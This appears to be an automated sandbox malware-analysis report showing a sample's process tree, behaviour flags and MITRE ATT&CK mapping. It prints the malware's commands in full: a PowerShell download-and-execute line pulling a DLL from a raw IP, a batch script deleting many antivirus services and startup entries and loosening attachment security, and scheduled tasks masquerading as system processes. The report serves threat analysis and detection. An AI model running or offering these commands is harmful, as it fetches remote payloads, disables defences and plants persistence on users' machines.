powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
3⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
-
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
@echo off
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f
set "osX=%PROCESSOR_ARCHITECTURE%"
if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
if "%osX%"=="x86" (
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
) else (
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
)
4⤵
-
C:\Users\Admin\AppData\Local\Temp\2FFE.exe
C:\Users\Admin\AppData\Local\Temp\2FFE.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\2FFE.exe
C:\Users\Admin\AppData\Local\Temp\2FFE.exe
2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4675.exe
C:\Users\Admin\AppData\Local\Temp\4675.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\cheat.exe
"C:\Users\Admin\AppData\Local\Temp\cheat.exe"
2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4ADB.exe
C:\Users\Admin\AppData\Local\Temp\4ADB.exe
1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 732
2⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 776
2⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 780
2⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 892
2⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 888
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\4FCE.exe
C:\Users\Admin\AppData\Local\Temp\4FCE.exe
1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 732
2⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 736
2⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 720
2⤵
- Program crash
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 736
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 880
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
-
C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
-
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
-
C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
-
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
-
C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
-
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
-
C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
-
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\catsrvps\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fsucenter" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_215406\fsucenter.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\resources\ShellExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\regedit\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\wcnwiz\WerFault.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service 1
Registry Run Keys / Startup Folder 1
Scheduled Task 1
Defense Evasion
Modify Registry 3
Disabling Security Tools 1
Virtualization/Sandbox Evasion 1
Install Root Certificate 1
Loading Replay Monitor...
Downloads